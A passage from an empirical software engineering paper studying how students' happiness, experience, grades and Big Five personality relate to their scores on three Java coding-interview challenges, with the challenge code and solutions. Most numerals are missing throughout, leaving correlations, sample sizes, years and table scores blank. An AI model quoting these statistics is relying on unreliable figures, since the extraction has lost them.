/peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. on paper. in addition, participants rated the whiteboard interview as more stressful. only in the whiteboard setting nervous tics displayed by participants were observed. without closer reference to technical interviews, attempts were made to predict how good a developer will perform in a specific environment, based on characteristics that we examine in part in our study. for example, borreguero et al. ( ) developed an index to find virtuous developers, which is based on the activities and contributions of the respective developers in open-source communities. the authors discuss similar work that aims, for example, at finding experts in such communities. although this is not about experts for solving coding challenges, at least we wanted to mention these related approaches in our work. further research is needed to evaluate the approach by borreguero et al. 
( ) and to be able to compare our results with theirs on which individual characteristics best predict a developer's performance in the respective environments.

theory construction and representation
to give a definition of what information systems researchers mean when they deal with theory, gregor ( ) proposed a taxonomy of five theory types in information systems research. each theory type has its own definition and consists of a set of structural components: means of representation, constructs, relationships, scope, causal explanations, testable propositions, and prescriptive statements. the theory for predicting, called type iii, ‘‘states what will happen in the future if certain preconditions hold’’ and ‘‘has testable propositions but does not have well-developed justificatory causal explanations’’ (gregor, : – ). we constructed a theory for predicting the influence of individual characteristics on the performance in solving coding challenges. with respect to the taxonomy and the relevant components for type iii theories, we took care to conduct and describe our study accordingly.

methods
to answer the research question and consequently develop the above-mentioned theory for predicting, we conducted an exploratory quantitative study in which participants had to solve three coding challenges on a computer and fill out questionnaires about their individual characteristics. exploratory research intends to gain information for further research through exploring a research question. ‘‘exploratory research cannot provide a conclusive answer to research problems [...], but they can provide significant insights to a given situation’’ (singh, : ).

research design
to motivate potential participants to take part in the study, they were told that the study would last at most min and that it was about coding challenges, similar to those used by several software and technology companies during their interview process. they were also told that the reason for the study is to find out why some software engineers perform better in coding challenges than others. per slot, one or two participants were invited to a quiet room where they were provided with an informed consent form and introduced verbally to the study. we used the same set of instructions to make sure that every participant received the same information. a translated english version of our participation instructions is provided in the paper supplements. after the introduction, participants had the chance to ask questions before they started to fill out the first questionnaire. a schematic representation of the research design is provided in fig. .

figure : schematic representation of the research design. four questionnaires on the individual characteristics had to be completed alternating with solving three coding challenges.

participants had to solve coding challenges implemented with java on a computer without the use of the internet or other resources.
to make sure that there was no advantage or disadvantage for any participant due to not knowing the used development environment, participants were asked if they were familiar with eclipse and java. each coding challenge had to be solved individually and within a given time. there was a given method signature so that the type of the return value as well as the parameters of this method were defined. it was not allowed to change the method signature in any way. a description of the problem was provided as a comment above the method. we will describe the challenges in greater detail below. the task then was to implement the method with a time-efficient solution to the problem. it was allowed to add private methods if needed and to use methods and data structures of the predefined java packages. participants were told that the solutions would be evaluated by correctness and time complexity, which are common judgment criteria for technical interviews (mcdowell, ). while solving a coding challenge, participants were allowed to take notes on paper. in addition to the given method signature for each challenge, there was also a main method with an example call of the method to be implemented. the expected output was provided as well. we provided the example to make it easier for the participants to understand the task and to increase the likelihood that no further questions were necessary while a participant solved a coding challenge. the participants were allowed to run the main method and to modify it to add their own test cases if desired. there was no other feedback on the correctness or efficiency of a participant’s solution than what the main method tested. participants were told that there was no advantage in submitting a solution before the time was up. if a candidate implemented multiple solutions within the time limit, he or she had to decide which one to submit in the end. when evaluating the solutions wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. afterwards we only considered the implementation provided in the prescribed method signature. we report our evaluation steps in the ‘analysis procedure’ section. participants all participants of the study were software engineering students of the university of stuttgart and they had to be at least at the end of the second semester of their bachelor program. the reason for the latter requirement was that at this point a student has the fundamental knowledge of data structures, algorithms, and time complexity that was required for solving the coding challenges in a time-efficient way. in their second semester, software engineering students attend a lecture which is specifically about data structures and algorithms. the sample consisted of bachelor students at the end of their second semester, seven students who were at least at the end of their fourth bachelor semester and eleven students who studied in the master’s program. these students were personally invited by email. in total, participants took part in our study. five identified as female and as male. the average age of the participants was . years with a standard deviation of . . although limited geographically and culturally, the sample was rich as participants covered the whole spectrum of academic levels. furthermore, they represent potential participants of technical interviews, that is, fresh bsc and msc graduates in computer science and software engineering. 
coding challenges the criteria for a good task vary depending on the context, target group and what the reasons are for conducting or attempting a coding challenge. for example, an interviewer wants to test a candidate’s ability to develop an algorithm, whereas a teacher of a programming course might want to teach time and space complexity. coding challenges will be selected accordingly. from what we know from the opinions and experiences of interviewers, we can argue that the existence of the following characteristics of a coding challenge has proven its worth in technical interviews (mcdowell, ; mcdowell, ): a brute-force solution which describes an algorithm that systematically goes through all possible solutions to a given problem should not be the most efficient solution to the problem. the reason is that brute-force algorithms usually are the most obvious way of solving a coding challenge and so they are the first solutions that even a below-average coding challenge solver can come up with. if one reason for developing a coding challenge is to find out if a candidate can think critically about his or her initial solution and how this solution can be optimized, then coding challenges with an inefficient brute-force solution and ways to improve it are most suitable. again, for interviewers it is important to see the logical thinking process and how the candidate approaches an unknown problem (mcdowell, ). also, a coding challenge should therefore not just test a single piece of knowledge, for example, a particular programming language feature, except this is what the interviewer aims for. there would be a high chance that some otherwise good coding challenge solvers do not know about this single fact and thus the results become unreliable. more generally, mcdowell ( ) recommends interviewers to ‘‘use hard questions, not hard knowledge’’ to focus on problem-solving and other skills that cannot be learned quickly at work. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recommendations from researchers in the field of creating tasks for programming competitions are similar to the characteristics of good coding challenges for technical interviews. for example, burton & hiron ( ) identified short and easy-to-understand problem descriptions as one criterion for a good task on the international olympiad in informatics. another is the existence of several solutions of varying difficulty and efficiency. different from technical interviews, programming competition tasks also consider, for example, that tasks should be fun and allow participants to have learning experiences (dagiene & futschek, ). we followed the recommendations of the interviewers and researchers mentioned above and designed our study in a way that a participant only had to interact with his or her computer and that there should be no need for asking for further clarification. this is different from some technical interviews where the challenge description does not provide enough information to find a satisfactory solution and the candidate is expected to ask further questions before attempting to solve the coding challenge. in our study, we only measure the combination of finding and implementing an algorithm to a given coding challenge, and neither explicitly observe how well participants are at understanding problem statements nor how much a participant cares about requirements engineering. 
thus, in addition to the characteristics described above, for our study a good coding challenge was not only easily understandable but also unambiguous. we also chose challenges where finding an efficient solution was challenging but the implementation should have been straightforward, because we could not expect every candidate to be familiar with the particularities of the programming language. to avoid making the participants spend too much time on handling edge cases, some limitations to the input parameters were provided in the task description. the set of coding challenges we chose covers a range of concepts which are commonly required for solving coding challenges. this includes the use of appropriate data structures, an optimization problem, and recursive thinking. in the following we describe each of the three coding challenges. they were presented to the participants in german, which is their native language, to minimize misunderstandings. the time limit given for each challenge was for understanding the task, finding an algorithm, and implementing the algorithm. we piloted the study with a male student in a higher bachelor semester to make sure that the time limit for each challenge was sufficient for the participant to come up with a solution. the test participant was able to solve the first two challenges correctly with some time pressure for the first challenge and no time pressure for the second one. in addition, after the pilot test we showed the candidate possible solutions for the third task and it took only a short time until he understood the proposed solutions. this strengthened our assumption that the tasks can be solved and that they can be solved within the given time. additionally, after each challenge we assessed whether the participants felt that they were under time pressure. we report all assessed variables in section ‘conceptual model’. challenge —pairs of integers ( min) the first coding challenge, in listing , was considered to be the easiest one, at least when it comes to finding any correct solution to the problem. a brute-force algorithm where wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. every possible combination of two numbers is tested in two for-loops is straightforward and runs in o(n ), where n is the size of the integer array. another conceivable solution with a time complexity of o(n·log(n)) sorts first and then applies a binary search to find matching pairs. furthermore, by using an appropriate data structure one can come up with a solution that runs in o(n). such a solution is given in listing . challenge —mansion ( min) the second challenge was taken from the australian informatics olympiad and is presented in listing . in the main method there was a detailed example given including an ascii art that illustrated the scenario, similar to the example and illustration given in the task description of the aio task (http://archive.is/e qeg). one approach of solving this coding challenge is to use a sliding window of length w that covers w houses and is shifted along all the houses in the array. the sum of people living in these w houses is the amount of people living opposite the mansion. each time when shifting the window, one can either calculate the sum of all houses covered by the window or simply use the last sum and subtract the people from the one house that is no longer covered by the window and adding the number of people of the one house that is now covered by the window. 
the first solution runs in o(n·w) and the second solution runs in o(n), where n is the number of houses. this problem involves considerable problem translation, as it is a rather abstract task. we wanted to ensure that different common types of coding challenges were represented in our study, and this task is a type of challenge that appears in technical interviews (see, e.g., mcdowell ( )). to prevent comprehension problems, the problem descriptions were presented to the participants in their mother tongue. during the experiment, the first author of this submission was present in the room to answer any questions that arose. of the participants, only one person asked for clarification of the mansion task. we have seen no indication that misunderstandings arose.

challenge 3: triple step ( min)
the third coding challenge is also the hardest one in our study. it is described in the book cracking the coding interview (mcdowell, ) and the ability of recursive thinking is beneficial to find an approach to solving this problem. the challenge itself is provided in listing 5. a simple recursive solution with a time complexity of roughly o(3^n) is in listing 6. an alternative implementation would be a recursive depth-first search for all possible permutations starting from the bottom of the staircase. in either case the time complexity is not ideal, as the same subtrees have to be calculated multiple times. for example, in the recursive solution in listing 6, for n= the algorithm calculates the solution for countWays( ) twice. one could store the solutions to such a subproblem in an additional memory structure. this reduces the time complexity to o(n). as we told the participants that each solution is only evaluated by correctness and time complexity, we ignore the differences in space complexity. however, with the iterative solution in listing 7 one can avoid the need for additional memory and get to a solution with a time complexity of o(n) as well.

/**
 * in the given array, find the number of integer pairs with a given
 * difference.
 *
 * an example is given in the main method.
 *
 * the following applies:
 * numbers contains at least two integers
 * numbers contains no duplicates
 * dif >=
 */
public static int pairCount(int[] numbers, int dif) {
    // todo
    return 0;
}

public static void main(String[] args) {
    int[] numbers = { , , , , };
    int dif = 2;
    // expected output:
    // the pairs with a difference of two are: { , } { , } { , }.
    System.out.println(pairCount(numbers, dif));
}

listing 1: coding challenge 1

public static int pairCount(int[] numbers, int dif) {
    HashSet<Integer> set = new HashSet<Integer>();
    int count = 0;
    for (int i : numbers) {
        if (set.contains(i + dif)) {
            count++;
        }
        if (set.contains(i - dif)) {
            count++;
        }
        set.add(i);
    }
    return count;
}

listing 2: a solution to coding challenge 1 in o(n)

/**
 * you want to build a mansion along a road. on the other side of the street
 * there are houses, in which a certain number of people live.
 *
 * your mansion is as long as w houses together.
 *
 * place your mansion in such a way that on the other side of the street as
 * many people as possible live opposite your mansion.
 * this greatest possible number should be returned by this method.
 *
 * an example is given in the main method.
 *
 * the following applies:
 * <= w <= houses.length <=
 * the number of people in each house is >=
 */
public static int mansion(int[] houses, int w) {
    // todo
    return 0;
}

listing 3: coding challenge 2

public static int mansion(int[] houses, int w) {
    int count = 0;
    for (int i = 0; i < w; i++) {
        count += houses[i];
    }
    int lastWindow = count;
    for (int i = 1; i + w <= houses.length; i++) {
        int currentWindow = lastWindow - houses[i - 1] + houses[i - 1 + w];
        if (currentWindow > count) {
            count = currentWindow;
        }
        lastWindow = currentWindow;
    }
    return count;
}

listing 4: a solution to coding challenge 2 in o(n)

/**
 * a child is climbing up a staircase with n steps, and can hop either
 * 1 step, 2 steps, or 3 steps at a time. implement a method to count how
 * many possible ways the child can jump up the stairs.
 *
 * an example is given in the main method.
 *
 * the following applies:
 * 0 <= n <=
 * if n = 0, return 1
 */
public static int countWays(int n) {
    // todo
    return 0;
}

public static void main(String[] args) {
    int n = 3;
    // expected output:
    // these are the possibilities to climb the three stairs:
    // {1, 1, 1}, {1, 2}, {2, 1}, {3}
    System.out.println(countWays(n));
}

listing 5: coding challenge 3

public static int countWays(int n) {
    if (n < 0) {
        return 0;
    } else if (n == 0 || n == 1) {
        return 1;
    } else {
        return countWays(n - 1) + countWays(n - 2) + countWays(n - 3);
    }
}

listing 6: a recursive solution to coding challenge 3 in o(3^n)
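the text above mentions that storing solutions to already-computed subproblems in an additional memory structure reduces the recursive approach to o(n); the original listings do not include such a variant, so the following is only an illustrative sketch of what a memoized version could look like (the method and array names are ours):

public static int countWaysMemo(int n) {
    // memo[i] caches the number of ways to climb i steps; -1 marks values not yet computed
    int[] memo = new int[n + 1];
    java.util.Arrays.fill(memo, -1);
    return countWaysMemo(n, memo);
}

private static int countWaysMemo(int n, int[] memo) {
    if (n < 0) {
        return 0;
    } else if (n == 0 || n == 1) {
        return 1;
    } else if (memo[n] != -1) {
        return memo[n];   // reuse the cached subproblem instead of recomputing the subtree
    } else {
        memo[n] = countWaysMemo(n - 1, memo) + countWaysMemo(n - 2, memo) + countWaysMemo(n - 3, memo);
        return memo[n];
    }
}

each subproblem is then solved at most once, which gives the o(n) running time mentioned above at the cost of the additional memory, whereas the iterative solution in listing 7 below achieves the same time bound without it.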
public static int countWays(int n) {
    int result = 1;
    int a = 1;
    int b = 0;
    int c = 0;
    for (int i = 0; i < n; i++) {
        result = a + b + c;
        c = b;
        b = a;
        a = result;
    }
    return result;
}

listing 7: an iterative solution to coding challenge 3 in o(n)

conceptual model
based on existing literature, we created a conceptual model to aid our quantitative exploration. we included four constructs related to individuals that are potentially linked to coding challenge performance, namely happiness, experience, academic performance, and personality. we describe each of them in the following, justify their inclusion in our study with relevant literature, and describe how we operationalized and measured them. the measure of the coding challenge performance is described in the ‘analysis procedure’ section. we provide our conceptual model, variables, and operationalization in fig. . the following subsections describe the candidate constructs as well as a rationale for their inclusion.

happiness
before explaining the inclusion of happiness, we need to define it together with the related concept of affect. under a hedonistic view (as opposed to aristotelian eudaimonia, which is the realization of conducting a satisfactory life full of quality (haybron, )), happiness is a sequence of experiential episodes (haybron, ) and individuals are happy when they experience ‘‘an excess of positive over negative affect’’ (bradburn, : ). affect, in turn, has been defined by russell ( ) as ‘‘a neurophysiological state that is consciously accessible as a simple, nonreflective feeling that is an integral blend of hedonic (pleasure–displeasure) and arousal (sleepy–activated) values’’ (p. ). affect, in other words, is the basic building block of emotions and moods.
we consider it a sensible choice to have happiness as a candidate predictor for coding challenge performance: happiness and affect in general have been found to positively impact job performance (e.g., oswald, proto & sgroi ( )) and analytic problem-solving (e.g., graziotin, wang & abrahamsson ( )). we have published extensively on the relationship between happiness and software developers’ performance while programming (e.g., graziotin et al. ( ); graziotin, wang & abrahamsson ( ), the latter being a theory of affect and performance while programming). in these studies, we found support for the happy, therefore productive (high-performing) developer. when we had the need to quantitatively assess the happiness of developers (graziotin, wang & abrahamsson, ; graziotin et al., ), we opted for the scale of positive and negative experiences (spane, diener et al. ( )). spane converges to other similar measurement instruments and has been psychometrically validated in several large-scale studies (rahm, heise & schuldt, ; diener et al., ; silva & caetano, ; li, bai & wang, ; sumi, ; jovanović, ; corno, molinari & baños, ; du plessis & guse, ), including consistency across full-time workers and students (silva & caetano, ). spane assesses how often a participant has experienced several affective states over the past four weeks. six positive and six negative states are graded on a 5-point scale of frequency. the positive and negative affective scores can be summed to form the spane-p(ositive) and spane-n(egative) dimensions, which range from 6 to 30. a subtraction of the spane-n from the spane-p value results in the affect balance, or spane-b (diener et al., ), dimension, which can vary from −24 to +24. a value of 0 indicates a balance of frequency of positive and negative affective experiences, and −24 and +24 indicate the negative and positive extremes, respectively.
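as a concrete illustration of the spane scoring just described, a participant’s three scores can be computed from the twelve item ratings as sketched below; this is our own illustrative helper, not part of the instrument or of the study materials:

// positiveItems and negativeItems each hold the six ratings (1 to 5) of the corresponding spane items
public static int[] spaneScores(int[] positiveItems, int[] negativeItems) {
    int spaneP = 0;
    int spaneN = 0;
    for (int rating : positiveItems) {
        spaneP += rating;              // spane-p: sum of the positive items, 6 to 30
    }
    for (int rating : negativeItems) {
        spaneN += rating;              // spane-n: sum of the negative items, 6 to 30
    }
    int spaneB = spaneP - spaneN;      // spane-b: affect balance, -24 to +24
    return new int[] { spaneP, spaneN, spaneB };
}

for example, a participant who rates every positive item with 4 and every negative item with 2 obtains spane-p = 24, spane-n = 12, and an affect balance of spane-b = +12.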
in particular, we were interested in the practical programming-related experience of software engineers and its relation to the coding challenge performance. programming experience is a multi-faceted construct that is usually expressed in years (e.g., mäntylä et al. ( )). it is widely accepted that the more experienced software engineers are, the higher their productivity will be (siegmund et al., ) and, more interestingly for the present study, their program comprehension abilities (siegmund et al., ). this is why we included experience in our set of candidates to predict coding challenge performance. we operationalized the construct of experience with frequency of coding challenges over the last year, general, java-related, and professional programming experience in years, but also reputation on stackoverflow.com. we included the latter because developers rely on it, draw on the knowledge from experts at different levels, and developer expertise wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we report some examples here but direct the reader to the work by cruz, da silva & capretz ( ) for many more references and interesting points. is well represented by good questions and answers on it (abdalkareem, shihab & rilling, ; pal, harper & konstan, ; kumar & pedanekar, ). for similar reasons, we also operationalized experience with the number of pull requests on github.com as they are positively correlated to several experience measures (rahman & roy, ). academic performance academic performance, or academic achievement, is ‘‘the extent to which a person has accomplished specific goals that were the focus of activities in instructional environments, specifically in school, college, and university’’ (steinmayr et al. ( ), online). while it would seem sensible to expect a positive correlation between academic performance and coding challenge performance, the literature did not provide any strong indication on either side. sackman, erikson & grant ( ) neither found a correlation between the performance of experienced programmers and trainee class grades nor between the performance and the score in programming ability tests; however, darcy & ma ( ) found that participants with a higher academic performance performed better in their programming task. building upon a non-established truth on academic performance, we included academic performance as a candidate for predictors to coding challenge performance, and we operationalized the construct with the students’ gpa score and exam grades for two courses on data structures, algorithms and complexity. the first course is called data structures and algorithms and students usually take it in their second bachelor semester. the second course is called algorithms and complexity and students usually take it at a later stage of their bachelor studies. the latter course covers algorithm complexity in more detail while the first course gives a practical introduction to the usage of data structures and algorithms for common problems. the two courses have different examiners. we also asked for the current semester in which the students are enrolled at as a way to assess the seniority of the participants. personality software engineering research on personality and individual performance can now be considered to be established, mature, yet still relevant and increasing (cruz, da silva & capretz, ). no prior research investigated coding challenges and personalities. 
however, an older study by evans & simkin ( ) found that a personality trait was a statistically significant explanatory factor for mastering computer concepts. once again, we had to inspect related work on more generic performance. in their systematic mapping study on personality research in software engineering, cruz, da silva & capretz ( ) found conflicting evidence on the influence of personality and various conceptualizations of performance of developers. there have been reports of personality being a successful indicator of academic performance (layman, ) as well as not being a significant factor predicting academic performance (golding, facey-shaw & tennant, ). some research conflict was found about individual performance of programmers. positive relationships between personality traits and programming task performance wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (shoaib, nadeem & akbar, ; karimi et al., ) have been found together with no significant relationship between personality and programming performance (bell et al., ). we see a mild indication that personality has an influence on individual performance while developing software and, in the absence of a strong trend, we include the construct in our conceptual model in the hope to shed some more light on the matter. even though the myers–briggs type indicator (mbti) is still the dominant framework for understanding and assessing personality in software engineering research, we are aware of its poor psychometric characteristics (pittenger, ) and that the five factor model (digman, ; mccrae & john, ) is a validated and better choice (mccrae & costa, ). the five factor model assesses personality along five dimensions, i.e., the big five, i.e., extraversion, agreeableness, conscientiousness, neuroticism and openness to experience. the participants’ personality was assessed with a validated german version of the big five inventory (lang, lüdtke & asendorpf, ). in addition to the mentioned variables, we also kept track of time pressure as a potential confounding factor. after each coding challenge we asked participants on a -point agreement scale if they agree that they were under time pressure when solving this coding challenge. analysis procedure we first report how we assessed solutions to the coding challenges to obtain an overall performance score. then we describe how we analyzed the data to answer the research question. assessing the coding challenge solutions the way solutions to coding challenges are evaluated in interviews and programming contests varies, but in the latter there seem to be more objective and absolute judgment criteria than in technical job interviews. it is common for solutions to be evaluated for correctness in programming competitions, and for this purpose there are a couple of test cases for each coding challenge. however, different evaluation schemes have been proposed that differ in the way of assessing solutions which pass some test cases (kemkes, vasiga & cormack, ). for example, the acm icpc only differentiates between a correct and an incorrect solution. if any test case fails, then a solution receives no points. the more problems a team solves, the higher it is ranked and in case of a tie, the time needed to solve the problems is the decisive criterion (bloomfield & sotomayor, ). the google code jam works in a similar way, except that each time a participant submits an incorrect solution he or she receives an additional time penalty. 
in case of a tie, the participant with the lowest penalty time will be ranked first. other scoring schemes award points for each successful test case. kemkes, vasiga & cormack ( ) proposed to award the full score for a batch of tests if the solution produces a correct output for any test case in that batch. in addition to judging the correctness of a solution, some contests also have a time limit in which a solution has to produce a correct output for a given test case (bloomfield & sotomayor, ). this forces participants of a programming competition not only to find a correct algorithm but also to find an efficient one.

table : scoring scheme. mapping from a solution's time complexity class to its score.

  challenge 1               challenge 2             challenge 3
  complexity      score     complexity    score     complexity    score
  o(n)            .         o(n)          .         o(n)          .
  o(n·log(n))     .         o(n·w)        .         o(3^n)        .
  o(n^2)          .

to assess a participant’s performance we imitated how recruiters evaluate the performance of candidates in technical job interviews, that is, in relation to each other and with respect to correctness and time complexity (mcdowell, ). participants were told about the latter aspect before the start of the study. although it would have been possible to determine the best possible time complexity class of an algorithm for the given problems, we could not be sure that this solution could be achieved under the conditions of our study. it was therefore essential to assess the participants’ solutions in relation to each other. additionally, we made use of the all-or-nothing scoring principle (kemkes, vasiga & cormack, ) known from several programming competitions. for a participant’s solution to a single coding challenge we first ran automated test cases on the given source code to see if it produced correct results. if any test case failed, the solution was considered to be incorrect and given zero points. if the solution passed all test cases, we analyzed its time complexity. a concrete scoring scheme based on our results is provided in table . solutions in the best given time complexity class, which, in our scenario, were the solutions with the most efficient algorithm for the problem, were given one point. in case participants came up with more than one correct algorithm in different complexity classes, the solutions were ranked and evaluated on a linear scale between zero and one. this means, for example, that for two correct solutions in different time complexity classes the second best solution receives a score of . , whereas for three correct solutions in different time complexity classes the second best receives a score of . and the third best solution receives a score of . . as the third coding challenge was expected to be the hardest one, we multiplied the achieved score for the third coding challenge by a factor of . . the overall performance score of a participant was obtained by summing up the scores for each of the three coding challenges. the maximum score achievable was . .

data analysis
to answer the research question, we calculated several correlation coefficients between a participant’s coding challenge performance score and the quantitative answers to the questionnaire items which operationalized the candidates for predictor variables provided in fig. . we used correlation coefficients, which range from −1 to +1, to explore which individual characteristics were related to the performance in solving coding challenges.
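the scoring scheme described in this section can be summarized in a short sketch. note that this is our own illustration, that the exact score values and the weighting factor for the third challenge are not recoverable from this copy of the text, and that one plausible reading of the linear scale (best class scores 1, evenly spaced steps down to 1/numClasses) is assumed here:

// rank: 1 for the most efficient correct complexity class observed, 2 for the next, and so on
// numClasses: number of distinct complexity classes among all correct solutions to the challenge
public static double challengeScore(boolean allTestsPassed, int rank, int numClasses) {
    if (!allTestsPassed) {
        return 0.0;   // all-or-nothing: a single failing test case means zero points
    }
    return (double) (numClasses - rank + 1) / numClasses;
}

// the third challenge was weighted by a factor; its exact value is left as a parameter here
public static double overallScore(double score1, double score2, double score3, double weightChallenge3) {
    return score1 + score2 + weightChallenge3 * score3;
}

with this reading, two observed classes would yield scores of 1 and 0.5, and three observed classes would yield 1, 0.67, and 0.33; whether these match the original values cannot be verified from this copy.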
we are aware of an open debate (murray, ) on whether likert scales represent ordinal or continuous intervals. while the debate still does not have clear indications, we opted to consider all our scales to be continuous in nature and likert items are discrete values on a continuous scale. therefore, we use pearson’s correlation coefficient where its assumptions wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. are met, and spearman’s rank correlation coefficient otherwise. we met the latter case for affective states, work experience, experience with coding challenges and the study progress. we report all calculated correlation coefficients with emphasis on moderate and strong relationships in the following section. the anonymized raw data for this study is available in the supplements of the present paper. results we characterize our participants in the ‘methods’ section. we refer to them in this section using a post-experiment anonymous identifier in the form of px, where x ranges from to . the identifier also represents the ranking of the participants, where implies the highest coding challenge performance score. we first want to report on the performance of each participant to provide a clear overview of the frequency of time complexity classes for correct solutions and how the overall score for each participant is achieved. table shows the concrete scoring scheme and table shows the resulting scores for the participants and illustrates the effect of our scoring scheme. due to the multiplication factor of . for the third coding challenge, the weakest solution to the third coding challenge receives the same score as the best solution to the easier coding challenges. however, the ranking order of the participants would not look much different with equal factors of . for all three coding challenges. p would have the same score as p to p . p would be ranked after p and before p . the average participant had . correct solutions and a score of . out of a maximum score of . . eleven participants scored the median and mode value of . . only one participant achieved the highest possible score and four participants solved none of the challenges correctly and thus had a score of . from table we see that participants came up with a solution to the first coding challenge but only two participants were able to implement something different from the brute-force algorithm. for the second challenge, of correct solutions, nine run in linear time, which is the best possible for all challenges. participant p as well as p to p were close to a solution for the second challenge but they did not implement the termination condition for their loop correctly which resulted in failed test cases. the third coding challenge was solved by six participants. although the number of correct solutions was the smallest of the three coding challenges and the number of complexity classes to which these solutions belong was not higher than for the other coding challenges, with four different algorithms the diversity of correct solutions was the highest. after each coding challenge, participants had to indicate on a -point likert scale how much they were under time pressure when solving the task they had previously worked on. accordingly, for the first coding challenge the average time pressure was . and . for only those participants who came up with a correct solution. for the second coding challenge the average time pressure was . and . 
for participants with correct solutions. the median value was and the mode was for both coding challenges, which means that participants most often disagreed with the statement that they felt under time pressure. this is different for the third coding challenge, for which the average time pressure was . (median = . , mode = ) and . for the six participants with a correct solution.

table : performance scores. individual performance of the participants. each row contains the time complexity classes of a participant's correct solutions to the corresponding challenge. incorrect solutions are marked with a dash.

  participant   challenge 1    challenge 2   challenge 3   score
  p1            o(n)           o(n)          o(n)          .
  p2            o(n·log(n))    –             o(n)          .
  p3            o(n^2)         o(n)          o(3^n)        .
  p4            o(n^2)         o(n)          o(3^n)        .
  p5            o(n^2)         o(n)          o(3^n)        .
  p6            o(n^2)         o(n·w)        o(3^n)        .
  p7            o(n^2)         o(n)          –             .
  p8            o(n^2)         o(n)          –             .
  p9            o(n^2)         o(n)          –             .
  p10           o(n^2)         o(n)          –             .
  p11           o(n^2)         o(n)          –             .
  p12           o(n^2)         o(n·w)        –             .
  p13           o(n^2)         o(n·w)        –             .
  p14           o(n^2)         o(n·w)        –             .
  p15           o(n^2)         o(n·w)        –             .
  p16           o(n^2)         o(n·w)        –             .
  p17           o(n^2)         o(n·w)        –             .
  p18           o(n^2)         o(n·w)        –             .
  p19           o(n^2)         o(n·w)        –             .
  p20           o(n^2)         o(n·w)        –             .
  p21           o(n^2)         o(n·w)        –             .
  p22           o(n^2)         o(n·w)        –             .
  p23           o(n^2)         –             –             .
  p24           o(n^2)         –             –             .
  p25           o(n^2)         –             –             .
  p26           o(n^2)         –             –             .
  p27           o(n^2)         –             –             .
  p28           o(n^2)         –             –             .
  p29           –              –             –             .
  p30           –              –             –             .
  p31           –              –             –             .
  p32           –              –             –             .

happiness
for our participants, the average spane-p(ositive) value of . was higher than the average spane-n(egative) value of . , and each of the six positive states that contribute to the spane-p value was higher on average than its counterpart. the spane-b (mean = . , sd = . ), % ci [ . – . ] affect balance score did not differ significantly from the recently established normative scores for the software developer population (graziotin et al., ).
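the correlation tables that follow report pearson's r where its assumptions were met and spearman's rank correlation coefficient otherwise, as explained in the analysis procedure. purely for illustration (this is not the authors' analysis code), pearson's r can be computed as follows:

public static double pearsonR(double[] x, double[] y) {
    int n = x.length;                       // assumes x and y have the same length
    double meanX = 0.0, meanY = 0.0;
    for (int i = 0; i < n; i++) {
        meanX += x[i];
        meanY += y[i];
    }
    meanX /= n;
    meanY /= n;
    double cov = 0.0, varX = 0.0, varY = 0.0;
    for (int i = 0; i < n; i++) {
        cov  += (x[i] - meanX) * (y[i] - meanY);
        varX += (x[i] - meanX) * (x[i] - meanX);
        varY += (y[i] - meanY) * (y[i] - meanY);
    }
    return cov / Math.sqrt(varX * varY);    // ranges from -1 to +1
}

spearman's rank correlation coefficient results from applying the same formula to the ranks of the observations rather than to the raw values.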
table shows the correlation coefficients between the traits and the coding challenge performance score. what we see from our results is that there is a significant moderate negative relationship between conscientiousness and the performance score, r( )=− . , p < . . there also is a weak negative relationship between extraversion and the performance score, r( )=− . . for the other three personality traits there is no relationship in our data. academic performance the variables for the academic performance provide the highest values for pearson’s r in our data set. from the results shown in table we see that there is a strong negative wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table correlation results for personality summary of the correlation coefficients between the big five personality traits and the coding challenge performance score (n= , * p < . ). variable pearson’s r extraversion − . agreeableness − . conscientiousness − . * neuroticism − . openness . table correlation results for academic performance. summary of the correlation coefficients between the coding challenge performance score and variables operationalizing the academic performance (* p < . , rs is spearman’s rank correlation coefficient, n is the number of participants for whom a measurement was possible). variable pearson’s r rs n current gpa − . * b.sc. gpa (master students only) − . grade for data structures and algorithms course − . * grade for algorithms and complexity course − . study progress . relationship between the performance scores and the grade point averages master students received in their bachelor’s degree, r( )=− . . also, there is a significant strong negative relationship between the performance scores and the grades for the data structures and algorithms course, r( )=− . , p < . and a significant moderate negative relationship between the performance scores and the current grade point average, r( )=− . , p < . . as in germany lower grades are better than higher ones, these negative relationships mean that participants with better grades were also the better coding challenge solvers. the grade point average for the data structures and algorithms course was . (sd= . ) in our sample and therefore much better than the grade point average for the algorithms and complexity course which was . (sd= . ). we only see a weak negative correlation for the latter course with the coding challenge performance score, r( )=− . . study progress was represented as a three-valued factor: students at the beginning of their bachelor’s program ( participants), students that are at least in the fourth semester of the bachelor’s program ( participants) and master students ( participants). the participants in the first group had an average score of . (median = . ). those in the second group had a score of . (median = . ). the third group had an average score of . (median = . ). the highest score of . was achieved by a master student, the maximum score in the group with the advanced bachelor students was . and the maximum score for the students at the beginning of their bachelor’s program was . . we found a weak positive relationship between the study progress and the performance scores, rs( )= . . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table correlation results for experience. summary of the correlation coefficients between experience and the coding challenge performance score (n = , * p < . 
